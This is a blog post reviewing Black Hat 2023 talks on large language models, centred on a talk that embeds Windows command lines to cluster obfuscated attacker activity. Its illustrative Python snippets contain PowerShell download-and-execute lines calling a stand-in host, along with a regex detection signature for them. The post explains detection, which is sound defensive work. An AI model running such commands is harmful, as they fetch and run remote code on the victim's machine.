Black Hat 2023 Review: LLMs Everywhere
by David Elkind on Aug 15, 2023 1:12:38 PM
I attended as many Black Hat briefings as possible this year. As a data scientist, I paid particular attention to the data science, machine learning, and artificial intelligence talks. Before we get into details, let’s address the elephant in the room: ChatGPT and LLMs.
Yes, it did seem like every third talk was about trying to apply a large language model (LLM) to either hack or secure a computer. I don’t doubt that the hacker and security communities will continue to extract value from the compressed knowledge stored in large language models, and made available in user-friendly interfaces such as ChatGPT. But the organizations that extract the most value from LLMs will be the ones that are best able to take advantage of these models’ power for interpreting language. One talk in particular did an excellent job of this.
This Year’s Best Application of Large Language Models (LLMs)
In my opinion, the talk that made the best use of a large language model was “IRonMAN: InterpRetable Incident Inspector Based ON Large-Scale Language Model and Association miNing” by Sian-Yao Huang, Cheng-Lin Yang, and Chung-Kuan Chen at CyCraft Technology. The basic idea is to borrow the strength of LLMs in interpreting natural language, and use that interpretive power to create vector representations of Windows command lines.
Natural languages are very flexible, with many ways to express the same information. Command lines have a certain amount of flexibility of their own. The first source of that flexibility is obfuscation: there are several distinct but equivalent ways to write the same command. This matters in a security context because obfuscation lets a command evade detection by tools like regular expressions.
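To make that concrete, here is a small illustrative sketch (the command lines and the pattern are made up for this post) of how a signature-style regular expression can miss an obfuscated variant of the same behavior:

```python
import re

# A naive signature looking for a suspicious download-and-execute pattern.
signature = re.compile(r"DownloadString", re.IGNORECASE)

# Hypothetical command lines, for illustration only.
plain = "powershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://evil.example/p.ps1')"
# The same behavior hidden behind -EncodedCommand (a base64-encoded script block, truncated here).
obfuscated = "powershell.exe -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA..."

print(bool(signature.search(plain)))       # True: the signature fires
print(bool(signature.search(obfuscated)))  # False: same behavior, no match
```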
The second source of nuance is that the same string can have different meanings in different contexts. As an example, a user could invoke a command foo and also pass an argument named foo to the command; these usages could have the same or distinct meanings. A regular expression would hit on both of those usages, even if our intention is to only capture one of them.
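As a toy illustration (again with hypothetical command lines), a plain pattern simply cannot tell those two usages apart:

```python
import re

pattern = re.compile(r"\bfoo\b")

# Hypothetical command lines: 'foo' as the program being run vs. 'foo' as a mere argument value.
as_command  = "foo --target 10.0.0.5"
as_argument = "backup.exe --profile foo"

# The pattern fires on both, even if we only care about one of these usages.
print(bool(pattern.search(as_command)))   # True
print(bool(pattern.search(as_argument)))  # True
```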
LLMs take (encoded) strings as inputs and yield numerical representations as outputs. The speakers leverage these numerical outputs by observing that the representations of equivalent command lines tend to sit closer to each other than to those of dissimilar command lines, even when obfuscation is used. This gives the model a certain amount of robustness to variations in the input and allows one to group together command lines from different incidents, facilitating attribution.
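As a rough sketch of the idea, using an off-the-shelf sentence-embedding model and library as a stand-in for the authors' own model, grouping command lines by embedding similarity might look something like this:

```python
# A minimal sketch, assuming the generic sentence-transformers library and model named below;
# the talk uses its own large-scale language model, which this merely stands in for.
from sentence_transformers import SentenceTransformer, util

model = SentenceTransformer("all-MiniLM-L6-v2")

command_lines = [
    "powershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://evil.example/p.ps1')",
    "powershell.exe -NoP -W Hidden -c iex(new-object net.webclient).downloadstring('http://evil.example/p.ps1')",
    "ping.exe -n 4 8.8.8.8",
]

# Each command line becomes a vector; similar commands land near each other.
embeddings = model.encode(command_lines)

print(util.cos_sim(embeddings[0], embeddings[1]))  # expected: relatively high similarity
print(util.cos_sim(embeddings[0], embeddings[2]))  # expected: relatively low similarity
```

Once command lines live in a vector space like this, ordinary clustering or nearest-neighbor search can group related activity across incidents without brittle string matching.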
I want to emphasize that the main reason this talk is so intriguing to me is that it really leaned on the LLM for the thing that it is best at (interpreting text inputs) and incorporated that utility into a security workflow. Interpreting texts has enormous value for security researchers; using LLMs to do at machine speed what was previously a human-speed task is a big deal.
This talk does not rely on the chat interface at all! Instead, it peeks “under the hood” to work directly with the numerical representations that the model uses to interpret text.
In my humble opinion, the weaker LLM talks focused on the cat-and-mouse aspects of the chatbot interfaces: using ChatGPT to create “black hat” stuff. While the chat interface is impressive, and it can generate some amusing outputs, I don’t see it as a big value-add for security researchers, especially in light of the untrustworthiness of the results. For instance, a recent study found that ChatGPT generated plausible-but-incorrect answers to Stack Overflow questions 52% of the time. I would expect even worse results if we asked ChatGPT to respond to a security incident.
Looking to the Future
LLMs are a powerful tool, but to truly leverage that power, security researchers will need to think carefully about how to wield it. Where are security researchers bottlenecked? Are those bottlenecks related to interpreting large amounts of text? In the security space, I anticipate that LLM methods will find homes in assessing the security risks of source code, the code on web pages, and even decompiled binary executables. I hope that we see some of these applications at next year’s Black Hat.